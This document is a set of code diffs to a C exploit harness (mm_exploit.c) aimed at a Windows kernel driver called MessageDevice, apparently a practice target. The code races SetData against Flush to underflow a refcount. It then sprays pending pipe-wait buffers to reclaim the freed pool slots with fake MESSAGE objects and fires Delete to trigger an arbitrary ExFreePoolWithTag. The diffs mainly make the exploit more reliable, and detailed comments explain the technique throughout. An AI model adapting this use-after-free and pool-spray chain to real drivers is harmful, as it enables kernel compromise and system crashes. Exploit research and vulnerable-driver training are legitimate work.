+            /* A spray can fail (handle exhaustion, name collision) and leave the slot empty. Count
+             * only the ones that parked, or the run reports fake MESSAGEs it never planted. */
+            if (spray_pending_pipewait(idx, &c->Pool[idx], 0, 1)) InterlockedIncrement(c->PoolOk);
             ops++;
         }
         if ((c->Role == 0 || c->Role == 3) && c->MaxPasses > 0 && ++passes >= c->MaxPasses)
@@ -2019,7 +2063,7 @@ static int do_drift(int argc, char **argv) {
     DRIFT_CTX *ctx = calloc((size_t)nthreads, sizeof(*ctx));
     HANDLE *threads = calloc((size_t)nthreads, sizeof(*threads));
     if (!ctx || !threads) { free(ids); CloseHandle(dev); return 2; }
-    volatile LONG stop = 0;
+    volatile LONG stop = 0, ready = 0, failed = 0;
     HANDLE start = CreateEventW(NULL, TRUE, FALSE, NULL);
     if (!start) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
 
@@ -2034,6 +2078,8 @@ static int do_drift(int argc, char **argv) {
         ctx[i].Count = made;
         ctx[i].StartEvent = start;
         ctx[i].Ops = 0;
+        ctx[i].Ready = &ready;
+        ctx[i].Failed = &failed;
         DWORD_PTR mask;
         if (i < setters) { ctx[i].Role = 0; mask = masks[i % 2]; }
         else if (i == setters) { ctx[i].Role = 1; mask = MM_CPU_FLUSH_MASK; }   /* Flush(small) CPU0 */
@@ -2043,8 +2089,13 @@ static int do_drift(int argc, char **argv) {
         started++;
         if (!pin_thread(threads[i], mask, "drift worker")) { pinned = 0; break; }
     }
-    if (started != nthreads || !pinned) {
-        printf("[drift] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
+    /* && short-circuits: the roll call only runs once every worker exists and is pinned, so a
+     * missing thread fails here immediately instead of waiting out the readiness timeout. */
+    int prepared = (started == nthreads && pinned) &&
+                   await_workers_ready("drift", &ready, &failed, nthreads, 15000);
+    if (!prepared) {
+        if (started != nthreads || !pinned)
+            printf("[drift] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
         InterlockedExchange(&stop, 1);
         SetEvent(start);
         join_workers("drift", threads, started, 15000);
@@ -2087,8 +2138,15 @@ static int do_driftfire(int argc, char **argv) {
     int spray = argc > 4 ? atoi(argv[4]) : 300;
     int setters = argc > 5 ? atoi(argv[5]) : 1;
     int hold = argc > 6 ? atoi(argv[6]) : 0;   /* diag: hold after the race so KD can walk primed msgs */
-    if (count < 1 || passes < 1 || spray < 1 || setters < 1 || setters > 2 || hold < 0) {
-        printf("[driftfire] require count>=1, passes>=1, spray>=1, setters in 1..2, hold>=0\n");
+    if (count < 1 || passes != 1 || spray < 1 || setters < 1 || setters > 2 || hold < 0) {
+        printf("[driftfire] require count>=1, passes==1, spray>=1, setters in 1..2, hold>=0\n");
+        /* passes>1 was a lie, not a lever. Pass 1 moves every message small->large; the only
+         * flusher here walks the SMALL list, so from pass 2 on the setter is doing large->large
+         * SetData -- no cross-move, no unlink, no missing-inc, i.e. zero extra race attempts while
+         * looking like more. Moving them back to small between passes is not the fix either: that
+         * is the direction Flush(small) can free, so the next pass would re-touch a freed id and
+         * produce the uncontrolled 0x13A this mode exists to avoid. Raise `count` for volume, or
+         * use `drift`/`driftarb` for the continuous two-way race. */
         return 2;
     }
     WORD group = 0;
@@ -2121,7 +2179,7 @@ static int do_driftfire(int argc, char **argv) {
     DRIFT_CTX *ctx = calloc((size_t)nthreads, sizeof(*ctx));
     HANDLE *threads = calloc((size_t)nthreads, sizeof(*threads));
     if (!ctx || !threads) { free(ids); CloseHandle(dev); return 2; }
-    volatile LONG stop = 0;
+    volatile LONG stop = 0, ready = 0, failed = 0;
     HANDLE start = CreateEventW(NULL, TRUE, FALSE, NULL);
     if (!start) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
     const DWORD_PTR masks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };
@@ -2129,6 +2187,7 @@ static int do_driftfire(int argc, char **argv) {
     int pinned = 1;
     for (int i = 0; i < nthreads; i++) {
         ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
+        ctx[i].Ready = &ready; ctx[i].Failed = &failed;
         DWORD_PTR mask;
         if (i < setters) { ctx[i].Role = 3; ctx[i].MaxPasses = passes; mask = masks[i % 2]; }
         else { ctx[i].Role = 1; mask = MM_CPU_FLUSH_MASK; }   /* Flush(small) only */
@@ -2137,8 +2196,14 @@ static int do_driftfire(int argc, char **argv) {
         started++;
         if (!pin_thread(threads[i], mask, "driftfire worker")) { pinned = 0; break; }
     }
-    if (started != nthreads || !pinned) {
-        printf("[driftfire] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
+    /* The roll call matters most here: a setter that died on open_device() is already signalled,
+     * so the setter wait below would return at once and the fire phase would Delete a set of ids
+     * nothing ever raced -- a "no clean fire this run" that proves nothing. */
+    int prepared = (started == nthreads && pinned) &&
+                   await_workers_ready("driftfire", &ready, &failed, nthreads, 15000);
+    if (!prepared) {
+        if (started != nthreads || !pinned)
+            printf("[driftfire] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
         InterlockedExchange(&stop, 1); SetEvent(start);
         join_workers("driftfire", threads, started, 15000);
         for (int i = 0; i < started; i++) CloseHandle(threads[i]);
@@ -2246,13 +2311,14 @@ static int do_driftarb(int argc, char **argv) {
 
     PENDING_PIPEWAIT *pool = calloc((size_t)cap, sizeof(*pool));
     if (!pool) { free(ids); CloseHandle(dev); return 2; }
-    volatile LONG poolnext = 0;
+    volatile LONG poolnext = 0;      /* slots consumed (a failed spray still burns its slot) */
+    volatile LONG poolok = 0;        /* sprays that actually parked a fake MESSAGE */
 
     int nthreads = setters + 2 + reclaimers;
     DRIFT_CTX *ctx = calloc((size_t)nthreads, sizeof(*ctx));
     HANDLE *threads = calloc((size_t)nthreads, sizeof(*threads));
     if (!ctx || !threads) { free(pool); free(ids); CloseHandle(dev); return 2; }
-    volatile LONG stop = 0;
+    volatile LONG stop = 0, ready = 0, failed = 0;
     HANDLE start = CreateEventW(NULL, TRUE, FALSE, NULL);
     if (!start) { free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev); return 2; }
     const DWORD_PTR smasks[] = { MM_CPU_SETTER_MASK, MM_CPU_TRIGGER_MASK };  /* setters: CPU1, CPU3 */
@@ -2260,7 +2326,8 @@ static int do_driftarb(int argc, char **argv) {
     int pinned = 1;
     for (int i = 0; i < nthreads; i++) {
         ctx[i].Stop = &stop; ctx[i].Ids = ids; ctx[i].Count = made; ctx[i].StartEvent = start;
-        ctx[i].Pool = pool; ctx[i].PoolNext = &poolnext; ctx[i].PoolCap = cap;
+        ctx[i].Ready = &ready; ctx[i].Failed = &failed;
+        ctx[i].Pool = pool; ctx[i].PoolNext = &poolnext; ctx[i].PoolOk = &poolok; ctx[i].PoolCap = cap;
         DWORD_PTR mask;
         if (i < setters) { ctx[i].Role = 0; mask = smasks[i % 2]; }
         else if (i == setters) { ctx[i].Role = 1; mask = MM_CPU_FLUSH_MASK; }
@@ -2271,8 +2338,11 @@ static int do_driftarb(int argc, char **argv) {
         started++;
         if (!pin_thread(threads[i], mask, "driftarb worker")) { pinned = 0; break; }
     }
-    if (started != nthreads || !pinned) {
-        printf("[driftarb] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
+    int prepared = (started == nthreads && pinned) &&
+                   await_workers_ready("driftarb", &ready, &failed, nthreads, 15000);
+    if (!prepared) {
+        if (started != nthreads || !pinned)
+            printf("[driftarb] prepared only %d/%d pinned threads\n", pinned ? started : started - 1, nthreads);
         InterlockedExchange(&stop, 1); SetEvent(start);
         join_workers("driftarb", threads, started, 15000);
         for (int i = 0; i < started; i++) CloseHandle(threads[i]);
@@ -2294,11 +2364,25 @@ static int do_driftarb(int argc, char **argv) {
      * a stale+reclaimed node makes Delete call ExFreePoolWithTag(0x4242..) -- the clean arb-free. */
     LONG placed = InterlockedCompareExchange(&poolnext, 0, 0);
     if (placed > cap) placed = cap;
+    LONG topoff = 0;
     for (LONG i = placed; i < placed + 512 && i < cap; i++)
-        spray_pending_pipewait((int)i, &pool[i], 0, 1);
-    LONG total = placed + 512 < cap ? placed + 512 : cap;
-    printf("[driftarb] burst done; %ld arb IoSB buffers planted; Deleting %d ids to fire\n",
-           total, made);
+        if (spray_pending_pipewait((int)i, &pool[i], 0, 1)) topoff++;
+    LONG total = placed + 512 < cap ? placed + 512 : cap;   /* slots touched, not buffers planted */
+    LONG parked = InterlockedCompareExchange(&poolok, 0, 0) + topoff;
+    printf("[driftarb] burst done; %ld arb IoSB buffers planted across %ld slot(s)\n", parked, total);
+    fflush(stdout);
+    /* A slot cursor is not a reclaim population: sprays fail (handle exhaustion, name collision)
+     * and leave their slot empty. With nothing parked there is no fake MESSAGE to arb-free, so a
+     * "survived all Deletes" line would be measuring the spray, not the exploit. Say so instead. */
+    if (parked == 0) {
+        printf("[driftarb] no arb buffer was planted (last error %lu) -- nothing to fire; "
+               "not Deleting, re-run\n", GetLastError());
+        fflush(stdout);
+        for (LONG i = 0; i < total; i++) release_pending_pipewait(&pool[i]);
+        CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
+        return 1;
+    }
+    printf("[driftarb] Deleting %d ids to fire\n", made);
     fflush(stdout);
     for (int i = 0; i < made; i++)
         mm_delete(dev, ids[i]);
@@ -2337,7 +2421,7 @@ int main(int argc, char **argv) {
            "[flush-delay-spins] [groom-events] [setter-bytes]|"
            "arbfire [messages] [arb-spray-base] [flush-delay-spins] [groom-events] [setter-bytes]|"
            "drift [count] [seconds] [setters]|"
-           "driftfire [count] [passes] [spray] [setters]|"
+           "driftfire [count] [passes=1] [spray] [setters]|"
            "driftarb [count] [burst-ms] [setters] [reclaimers] [cap]|"
            "reclaimprobe [window-seconds] [spray-count] [hold-seconds] [targets] [wait|arb|afd|pipe]|"
            "spray [pipe|pending|mailslot] [datalen] [count] [start-delay-seconds]]\n",

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1133,6 +1133,36 @@ static int seed_messages_small(HANDLE dev, ULONG *ids, int made) {
     return seeded;
 }
 
+/*
+ * Drain both lists so a run starts from a known-empty state, and say so if that fails: a mode whose
+ * opening Flush was refused never had its premise. Checked here and in the other single-threaded
+ * (controlled) phases -- deliberately NOT inside the race threads, where Flush/SetData failures are
+ * an expected consequence of the corruption being provoked and a branch per call would perturb the
+ * very timing under test.
+ */
+static int reset_lists(const char *tag, HANDLE dev) {
+    if (mm_flush(dev, 0) && mm_flush(dev, 1)) return 1;
+    printf("[%s] could not drain the small/large lists (%lu) -- refusing to start from an "
+           "unknown state\n", tag, GetLastError());
+    return 0;
+}
+
+/*
+ * Fire the Delete trigger over every id and report how many the driver accepted. A refused Delete
+ * is not a miss: the arbitrary free is reached *through* Delete, so an id the driver rejected never
+ * exercised the trigger at all, and counting it toward "survived all Deletes" turns a broken run
+ * into an apparent exploit failure. Returns the number accepted.
+ */
+static int fire_delete_trigger(const char *tag, HANDLE dev, const ULONG *ids, int count) {
+    int done = 0;
+    for (int i = 0; i < count; i++)
+        if (mm_delete(dev, ids[i])) done++;
+    if (done != count)
+        printf("[%s] only %d/%d Deletes accepted (%lu) -- trigger not fully exercised\n",
+               tag, done, count, GetLastError());
+    return done;
+}
+
 static int arb_buffers_ready(const char *tag, int parked, int slots, DWORD spray_err) {
     if (parked > 0) return 1;
     printf("[%s] 0/%d arb IoSB buffers parked (last spray error %lu) -- nothing to fire; "
@@ -1488,7 +1518,12 @@ static int do_rip(int argc, char **argv, int arbfire) {
          * as the open piece. The mode still runs the full chain end to end; `arbdiag` holds before
          * the trigger so KD can confirm the (empty) stale-handle set. */
         SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);
-        mm_flush(dev, 1);                       /* drain the large list the setter built */
+        if (!mm_flush(dev, 1)) {                /* drain the large list the setter built */
+            printf("[arbfire] controlled Flush(large) refused (%lu) -- the primed messages were not "
+                   "freed, so a spray has nothing to reclaim; not firing\n", GetLastError());
+            free(ids); CloseHandle(dev);
+            return 1;
+        }
         int wcount = spray_count * 4;           /* dense reclaim of the freed slots */
         PENDING_PIPEWAIT *wheld = calloc((size_t)wcount, sizeof(*wheld));
         if (!wheld) { CloseHandle(dev); free(ids); return 2; }
@@ -1514,10 +1549,14 @@ static int do_rip(int argc, char **argv, int arbfire) {
             Sleep(120 * 1000);
         }
         fflush(stdout);
-        for (int i = 0; i < seeded; i++)
-            mm_delete(dev, ids[i]);            /* a stale+reclaimed id frees 0x4242.. -> bugcheck */
-        printf("[arbfire] survived all Deletes -- no stale+reclaimed handle fired this run; "
-               "re-run.\n");
+        /* A stale+reclaimed id frees 0x4242.. -> bugcheck. */
+        int fired = fire_delete_trigger("arbfire", dev, ids, seeded);
+        if (fired == 0)
+            printf("[arbfire] the driver accepted no Delete at all -- the trigger never ran; "
+                   "re-run.\n");
+        else
+            printf("[arbfire] survived %d/%d Deletes -- no stale+reclaimed handle fired this run; "
+                   "re-run.\n", fired, seeded);
         fflush(stdout);
         release_pipewait_array("arbfire", wheld, wcount);
         free(ids);
@@ -2066,6 +2105,11 @@ static DWORD WINAPI drift_thread(void *opaque) {
                 mm_setdata(dev, c->Ids[i], large, sizeof(large));
                 ops++;
             }
+        /* The driver calls in these race roles are deliberately unchecked, unlike every controlled
+         * phase (see reset_lists / fire_delete_trigger). Under a race that is corrupting the pool
+         * on purpose, a refused SetData/Flush is an expected outcome rather than an error to
+         * report, `Ops` counts attempts and not successes by design, and a branch per call would
+         * perturb the timing window the whole experiment is measuring. */
         } else if (c->Role == 1) {
             mm_flush(dev, 0);
             ops++;
@@ -2113,8 +2157,7 @@ static int do_drift(int argc, char **argv) {
         printf("[drift] open \\\\.\\MessageDevice failed: %lu\n", GetLastError());
         return 1;
     }
-    mm_flush(dev, 0);
-    mm_flush(dev, 1);                    /* start from empty small/large lists */
+    if (!reset_lists("drift", dev)) { CloseHandle(dev); return 1; }   /* empty small/large lists */
 
     ULONG *ids = calloc((size_t)count, sizeof(ULONG));
     if (!ids) { CloseHandle(dev); return 2; }
@@ -2232,8 +2275,7 @@ static int do_driftfire(int argc, char **argv) {
 
     HANDLE dev = open_device();
     if (!dev) { printf("[driftfire] open device failed: %lu\n", GetLastError()); return 1; }
-    mm_flush(dev, 0);
-    mm_flush(dev, 1);
+    if (!reset_lists("driftfire", dev)) { CloseHandle(dev); return 1; }
 
     ULONG *ids = calloc((size_t)count, sizeof(ULONG));
     if (!ids) { CloseHandle(dev); return 2; }
@@ -2319,9 +2361,16 @@ static int do_driftfire(int argc, char **argv) {
     }
 
     /* Controlled, single-threaded: Flush(large) frees the primed (RC==1) messages -- freed with
-     * their nodes alive -- then reclaim those freed 0x68 slots with arb IoSB fake MESSAGEs. */
-    mm_flush(dev, 1);
-    mm_flush(dev, 0);
+     * their nodes alive -- then reclaim those freed 0x68 slots with arb IoSB fake MESSAGEs.
+     * Checked, unlike the Flushes in the race threads: if this one is refused nothing was freed,
+     * so the spray has no stale slot to land in and a "no clean fire" verdict would be measuring
+     * the failed Flush. */
+    if (!mm_flush(dev, 1) || !mm_flush(dev, 0)) {
+        printf("[driftfire] controlled Flush refused (%lu) -- primed messages were not freed, so "
+               "there is nothing for the spray to reclaim; not firing\n", GetLastError());
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        return 1;
+    }
     PENDING_PIPEWAIT *held = calloc((size_t)spray, sizeof(*held));
     if (!held) { free(ctx); free(threads); free(ids); CloseHandle(dev); return 2; }
     int ok = 0;
@@ -2338,9 +2387,11 @@ static int do_driftfire(int argc, char **argv) {
     fflush(stdout);
 
     /* Fire: a stale+reclaimed node makes Delete call ExFreePoolWithTag(0x4242..,'Tfub'). */
-    for (int i = 0; i < made; i++)
-        mm_delete(dev, ids[i]);
-    printf("[driftfire] survived all Deletes -- no clean fire this run; re-run\n");
+    int fired = fire_delete_trigger("driftfire", dev, ids, made);
+    if (fired == 0)
+        printf("[driftfire] the driver accepted no Delete at all -- the trigger never ran; re-run\n");
+    else
+        printf("[driftfire] survived %d/%d Deletes -- no clean fire this run; re-run\n", fired, made);
     fflush(stdout);
 
     release_pipewait_array("driftfire", held, spray);
@@ -2382,8 +2433,7 @@ static int do_driftarb(int argc, char **argv) {
 
     HANDLE dev = open_device();
     if (!dev) { printf("[driftarb] open device failed: %lu\n", GetLastError()); return 1; }
-    mm_flush(dev, 0);
-    mm_flush(dev, 1);
+    if (!reset_lists("driftarb", dev)) { CloseHandle(dev); return 1; }
 
     ULONG *ids = calloc((size_t)count, sizeof(ULONG));
     if (!ids) { CloseHandle(dev); return 2; }
@@ -2478,9 +2528,11 @@ static int do_driftarb(int argc, char **argv) {
     }
     printf("[driftarb] Deleting %d ids to fire\n", made);
     fflush(stdout);
-    for (int i = 0; i < made; i++)
-        mm_delete(dev, ids[i]);
-    printf("[driftarb] survived all Deletes -- no clean fire this run; re-run\n");
+    int fired = fire_delete_trigger("driftarb", dev, ids, made);
+    if (fired == 0)
+        printf("[driftarb] the driver accepted no Delete at all -- the trigger never ran; re-run\n");
+    else
+        printf("[driftarb] survived %d/%d Deletes -- no clean fire this run; re-run\n", fired, made);
     fflush(stdout);
     release_pipewait_array("driftarb", pool, cap);
     CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -2053,7 +2053,8 @@ typedef struct _DRIFT_CTX {
                              * 5 = continuous arb-IoSB reclaim (fill freed 0x80 slots with 0x4242) */
     int MaxPasses;          /* setter roles: stop after this many passes (0 = until Stop) */
     HANDLE StartEvent;
-    volatile LONG64 Ops;
+    volatile LONG64 Ops;        /* driver calls attempted (the race denominator) */
+    volatile LONG64 Moves;      /* setter roles: cross-moves the driver actually accepted */
     /* Readiness handshake, shared by every worker of a run: a worker that cannot open the device
      * exits before the gate, and a coordinator checking only CreateThread/pinning would never
      * notice -- see await_workers_ready. */
@@ -2084,7 +2085,7 @@ static DWORD WINAPI drift_thread(void *opaque) {
     memset(small, 0x41, sizeof(small));
     InterlockedIncrement(c->Ready);
     WaitForSingleObject(c->StartEvent, INFINITE);
-    LONG64 ops = 0;
+    LONG64 ops = 0, moves = 0;
     int passes = 0;
     while (!InterlockedCompareExchange(c->Stop, 0, 0)) {
         if (c->Role == 0) {
@@ -2092,8 +2093,8 @@ static DWORD WINAPI drift_thread(void *opaque) {
              * the caller must be able to guarantee no SetData lands after the join (see
              * join_workers). One interlocked read per two DeviceIoControls is noise. */
             for (int i = 0; i < c->Count && !InterlockedCompareExchange(c->Stop, 0, 0); i++) {
-                mm_setdata(dev, c->Ids[i], large, sizeof(large));   /* small -> large cross-move */
-                mm_setdata(dev, c->Ids[i], small, sizeof(small));   /* large -> small cross-move */
+                if (mm_setdata(dev, c->Ids[i], large, sizeof(large))) moves++;  /* small -> large */
+                if (mm_setdata(dev, c->Ids[i], small, sizeof(small))) moves++;  /* large -> small */
                 ops += 2;
             }
         } else if (c->Role == 3) {
@@ -2102,14 +2103,15 @@ static DWORD WINAPI drift_thread(void *opaque) {
              * small->large cross-move races Flush(small) for the missing-inc, priming M onto the
              * large list; with no Flush(large) running, a primed M is never freed here. */
             for (int i = 0; i < c->Count && !InterlockedCompareExchange(c->Stop, 0, 0); i++) {
-                mm_setdata(dev, c->Ids[i], large, sizeof(large));
+                if (mm_setdata(dev, c->Ids[i], large, sizeof(large))) moves++;
                 ops++;
             }
-        /* The driver calls in these race roles are deliberately unchecked, unlike every controlled
-         * phase (see reset_lists / fire_delete_trigger). Under a race that is corrupting the pool
-         * on purpose, a refused SetData/Flush is an expected outcome rather than an error to
-         * report, `Ops` counts attempts and not successes by design, and a branch per call would
-         * perturb the timing window the whole experiment is measuring. */
+        /* A refused call in these race roles is NOT an error to abort on: the race exists to
+         * corrupt the pool, so failures are an expected outcome mid-run, and `Ops` deliberately
+         * counts attempts (the denominator of a race) rather than successes. What does matter is
+         * whether the race ever landed a cross-move at all -- `Moves` counts those separately, and
+         * a mode that primes messages before firing refuses to fire when it is zero. Flush's
+         * result is not tracked: a Flush that fails simply did not walk the list that round. */
         } else if (c->Role == 1) {
             mm_flush(dev, 0);
             ops++;
@@ -2133,6 +2135,7 @@ static DWORD WINAPI drift_thread(void *opaque) {
             break;
     }
     c->Ops = ops;
+    c->Moves = moves;
     CloseHandle(dev);
     return 0;
 }
@@ -2228,10 +2231,13 @@ static int do_drift(int argc, char **argv) {
     Sleep((DWORD)seconds * 1000);
     InterlockedExchange(&stop, 1);
     join_workers("drift", threads, nthreads, 30000);
-    LONG64 total = 0;
-    for (int i = 0; i < nthreads; i++) { total += ctx[i].Ops; CloseHandle(threads[i]); }
-    printf("[drift] survived %d s, %lld driver calls -- no win this run; re-run or raise volume\n",
-           seconds, (long long)total);
+    LONG64 total = 0, moved = 0;
+    for (int i = 0; i < nthreads; i++) { total += ctx[i].Ops; moved += ctx[i].Moves; CloseHandle(threads[i]); }
+    printf("[drift] survived %d s, %lld driver calls (%lld cross-moves accepted) -- no win this "
+           "run; re-run or raise volume\n", seconds, (long long)total, (long long)moved);
+    if (moved == 0)
+        printf("[drift] the driver accepted no cross-move at all -- this run did not race; that is "
+               "a harness/driver failure, not a negative result\n");
     CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
     return 0;
 }
@@ -2349,8 +2355,21 @@ static int do_driftfire(int argc, char **argv) {
         join_workers("driftfire", threads, setters, INFINITE);
     }
     join_workers("driftfire", &threads[setters], 1, 30000);
+    LONG64 moved = 0;
+    for (int i = 0; i < setters; i++) moved += ctx[i].Moves;
     for (int i = 0; i < nthreads; i++) CloseHandle(threads[i]);
-    printf("[driftfire] race done; setters stopped -- controlled fire phase\n");
+    /* The controlled phase below is premised on the race having primed something. If the driver
+     * refused every cross-move there is nothing on the large list at refcount-one-too-low, so no
+     * Flush can free it with its node alive and no Delete can fire -- "no clean fire this run"
+     * would be reporting a driver that never ran the race. */
+    if (moved == 0) {
+        printf("[driftfire] the race landed 0 cross-moves (%lu) -- nothing primed, so nothing can "
+               "fire; not proceeding to the reclaim/Delete phase\n", GetLastError());
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        return 1;
+    }
+    printf("[driftfire] race done (%lld cross-moves accepted); setters stopped -- controlled fire "
+           "phase\n", (long long)moved);
     fflush(stdout);
 
     if (hold > 0) {
@@ -2505,7 +2524,16 @@ static int do_driftarb(int argc, char **argv) {
      * would re-touch a freed id (an uncontrolled crash instead of the 0x4242 fire), and the pool
      * and id arrays are freed at the end of this function. */
     join_workers("driftarb", threads, nthreads, 60000);
+    LONG64 moved = 0;
+    for (int i = 0; i < setters; i++) moved += ctx[i].Moves;
     for (int i = 0; i < nthreads; i++) CloseHandle(threads[i]);
+    if (moved == 0) {
+        printf("[driftarb] the burst landed 0 cross-moves (%lu) -- no message was ever primed, so "
+               "the Delete trigger cannot fire; not firing\n", GetLastError());
+        release_pipewait_array("driftarb", pool, cap);
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        return 1;
+    }
 
     /* The burst primed/freed some messages; the reclaimers planted 0x4242 fake MESSAGEs into freed
      * 0x80 slots. Top that off with a synchronous batch to catch slots freed at the very end of the

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -1087,6 +1087,32 @@ static void release_pending_pipewait(PENDING_PIPEWAIT *rec);
  * in the same trigger and must all refuse it the same way. Takes the error captured at the spray
  * site, since printf between there and here can clobber GetLastError.
  */
+/*
+ * Release an array of pending waits, and free the array only if every record reached terminal
+ * completion. `release_pending_pipewait` deliberately keeps a record intact -- Outstanding, with
+ * its Buf and Iosb still live -- when a cancel cannot be confirmed, so the kernel never writes a
+ * freed buffer. But the `Iosb` is embedded IN this array, so freeing the array anyway would hand
+ * the kernel a freed IO_STATUS_BLOCK to write into: exactly the hazard that leak exists to
+ * prevent. Leak the array instead. That is bounded (one allocation per run, process-lifetime) and
+ * is the same trade the per-record path already makes.
+ */
+static void release_pipewait_array(const char *tag, PENDING_PIPEWAIT *recs, LONG count) {
+    if (!recs) return;
+    LONG stuck = 0;
+    for (LONG i = 0; i < count; i++) {
+        release_pending_pipewait(&recs[i]);      /* zeroed/never-sprayed records are a no-op */
+        if (recs[i].Outstanding) stuck++;
+    }
+    if (stuck > 0) {
+        printf("[%s] %ld pending wait(s) not confirmed cancelled -- leaking the %ld-record array "
+               "rather than freeing an IO_STATUS_BLOCK the kernel may still write\n",
+               tag, stuck, count);
+        fflush(stdout);
+        return;
+    }
+    free(recs);
+}
+
 static int arb_buffers_ready(const char *tag, int parked, int slots, DWORD spray_err) {
     if (parked > 0) return 1;
     printf("[%s] 0/%d arb IoSB buffers parked (last spray error %lu) -- nothing to fire; "
@@ -1451,8 +1477,8 @@ static int do_rip(int argc, char **argv, int arbfire) {
             if (spray_pending_pipewait(i, &wheld[i], i == 0, 1)) wok++;
         DWORD werr = GetLastError();
         if (!arb_buffers_ready("arbfire", wok, wcount, werr)) {
-            for (int i = 0; i < wcount; i++) release_pending_pipewait(&wheld[i]);
-            free(wheld); free(ids); CloseHandle(dev);
+            release_pipewait_array("arbfire", wheld, wcount);
+            free(ids); CloseHandle(dev);
             return 1;
         }
         printf("[arbfire] %d/%d arb IoSB buffers pending; triggering Delete on %d stale ids "
@@ -1473,8 +1499,7 @@ static int do_rip(int argc, char **argv, int arbfire) {
         printf("[arbfire] survived all Deletes -- no stale+reclaimed handle fired this run; "
                "re-run.\n");
         fflush(stdout);
-        for (int i = 0; i < wcount; i++) release_pending_pipewait(&wheld[i]);
-        free(wheld);
+        release_pipewait_array("arbfire", wheld, wcount);
         free(ids);
         CloseHandle(dev);
         return 1;
@@ -1897,8 +1922,7 @@ static int do_reclaimprobe(int argc, char **argv) {
                        : "\"MMWAIT!!\" at +0x00 means a natural reclaim landed");
         fflush(stdout);
         Sleep((DWORD)hold * 1000);
-        for (int i = 0; i < spray_count; i++) release_pending_pipewait(&held[i]);
-        free(held);
+        release_pipewait_array("probe", held, spray_count);
     } else if (use_afd) {
         /* AfdC context blobs: NonPaged, copied verbatim from +0x00, sized 0x68 -> 0x80 bucket. */
         memcpy(ramp, "MMAFDC!!", 8);
@@ -2270,8 +2294,8 @@ static int do_driftfire(int argc, char **argv) {
         if (spray_pending_pipewait(i, &held[i], i == 0, 1)) ok++;
     DWORD spray_err = GetLastError();
     if (!arb_buffers_ready("driftfire", ok, spray, spray_err)) {
-        for (int i = 0; i < spray; i++) release_pending_pipewait(&held[i]);
-        free(held); CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+        release_pipewait_array("driftfire", held, spray);
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
         return 1;
     }
     printf("[driftfire] %d/%d arb IoSB buffers pending (Buffer=0x%016llx); Deleting %d ids to fire\n",
@@ -2284,8 +2308,8 @@ static int do_driftfire(int argc, char **argv) {
     printf("[driftfire] survived all Deletes -- no clean fire this run; re-run\n");
     fflush(stdout);
 
-    for (int i = 0; i < spray; i++) release_pending_pipewait(&held[i]);
-    free(held); CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
+    release_pipewait_array("driftfire", held, spray);
+    CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
     return 0;
 }
 
@@ -2375,7 +2399,10 @@ static int do_driftarb(int argc, char **argv) {
         InterlockedExchange(&stop, 1); SetEvent(start);
         join_workers("driftarb", threads, started, 15000);
         for (int i = 0; i < started; i++) CloseHandle(threads[i]);
-        CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
+        /* Reached only with the gate still shut, so no reclaimer sprayed -- but go through the
+         * same release path rather than depend on that reasoning staying true. */
+        release_pipewait_array("driftarb", pool, cap);
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
         return 1;
     }
     SetEvent(start);
@@ -2402,8 +2429,8 @@ static int do_driftarb(int argc, char **argv) {
     printf("[driftarb] burst done; %ld arb IoSB buffers planted across %ld slot(s)\n", parked, total);
     fflush(stdout);
     if (!arb_buffers_ready("driftarb", (int)parked, (int)total, spray_err)) {
-        for (LONG i = 0; i < total; i++) release_pending_pipewait(&pool[i]);
-        CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
+        release_pipewait_array("driftarb", pool, cap);
+        CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
         return 1;
     }
     printf("[driftarb] Deleting %d ids to fire\n", made);
@@ -2412,8 +2439,8 @@ static int do_driftarb(int argc, char **argv) {
         mm_delete(dev, ids[i]);
     printf("[driftarb] survived all Deletes -- no clean fire this run; re-run\n");
     fflush(stdout);
-    for (LONG i = 0; i < total; i++) release_pending_pipewait(&pool[i]);
-    CloseHandle(start); free(ctx); free(threads); free(pool); free(ids); CloseHandle(dev);
+    release_pipewait_array("driftarb", pool, cap);
+    CloseHandle(start); free(ctx); free(threads); free(ids); CloseHandle(dev);
     return 0;
 }
 

--- a/examples/messagemanager/mm_exploit.c
+++ b/examples/messagemanager/mm_exploit.c
@@ -803,6 +803,7 @@ typedef struct _RACE_CONTEXT {
     volatile LONG *FlushDone;
     volatile LONG *DelaySpins;
     HANDLE PreemptEvent;
+    SIZE_T SetterLen;   /* setter's SetData length; large -> wide mutex-held window in the driver */
 } RACE_CONTEXT;
 
 typedef struct _WINDOW_CONTEXT {
@@ -863,9 +864,19 @@ static DWORD WINAPI race_thread(void *opaque) {
     HANDLE dev = open_device();
     if (!dev) return 1;
     if (ctx->ShootdownPage) (void)*ctx->ShootdownPage;
